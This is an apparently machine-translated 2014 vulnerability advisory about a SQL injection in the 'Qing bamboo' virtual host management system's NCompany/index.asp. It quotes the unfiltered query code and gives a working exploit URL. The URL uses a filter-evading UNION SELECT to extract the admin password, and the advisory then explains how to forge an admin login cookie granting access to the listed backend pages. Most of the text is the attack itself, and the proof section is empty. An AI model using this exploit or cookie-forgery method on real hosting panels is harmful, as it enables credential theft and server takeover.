Qing bamboo virtual host management system sql injection vulnerability with the backend configured cookie login-vulnerability warning-the black bar safety net

2014-02-24T00:00:00
ID MYHACK58:62201442503
Type myhack58
Reporter 佚名
Modified 2014-02-24T00:00:00

Description

Brief description:

Qing bamboo virtual host management systemsql injectionvulnerability

Detailed description:

Qing bamboo virtual host management systemsql injectionvulnerability

NCompany\Index. asp

loadfile_fromcache templatePath&"NCompany-Index.html" 'load index. html template

TempCon=TempCon&Application("Qz_TP_"& templatePath&"NCompany-Index.html")

Id=ReStrs(Request. QueryString("Id"))//filter is not strict

Set rs=Conn. Execute("Select * From [Qz_NComPany] Where [Id]="&Id)//directly into the sql statement

Address=rs("Address")

TelInfo=rs("TelInfo")

exp:ncompany/index. asp? id=1%09union%0 9%se%lect%091,2,3,4,5,adminpass,7,8,9,1 0,1 1%09from%09adminuser%09where%09id=1

Construct cookie:

AdminUser = injection of adminuser

PassWord = the injection of adminpass

AdminExu = system. asp, jihua. asp, news_admin. asp, mailtemplate. asp, ads. asp, success. asp, ServerQQ. asp, member. asp, message. asp, agent_fenlei. asp, grade. asp, sendmail. asp, proclass. asp, domain. asp, domainbuy. asp, domainupdate. asp, hostlist. asp, hostbuy. asp, the vpath. asp, bindcheck. asp, cert. asp, sqllist. asp, sqlbuy. asp, my_sqllist. asp, my_sqlbuy. asp, maillist. asp, mailbuy. asp, apppool. asp, scriptmaps. asp, serverlist. asp, apppoolmode. asp, serverdomain. asp, shopitem. asp, shoplist. asp, shopbuy. asp, money. asp, moneylog. asp, pay. asp, payonline. asp, domain_api. asp, password. asp, template. asp, links. asp

Vulnerability to prove:

!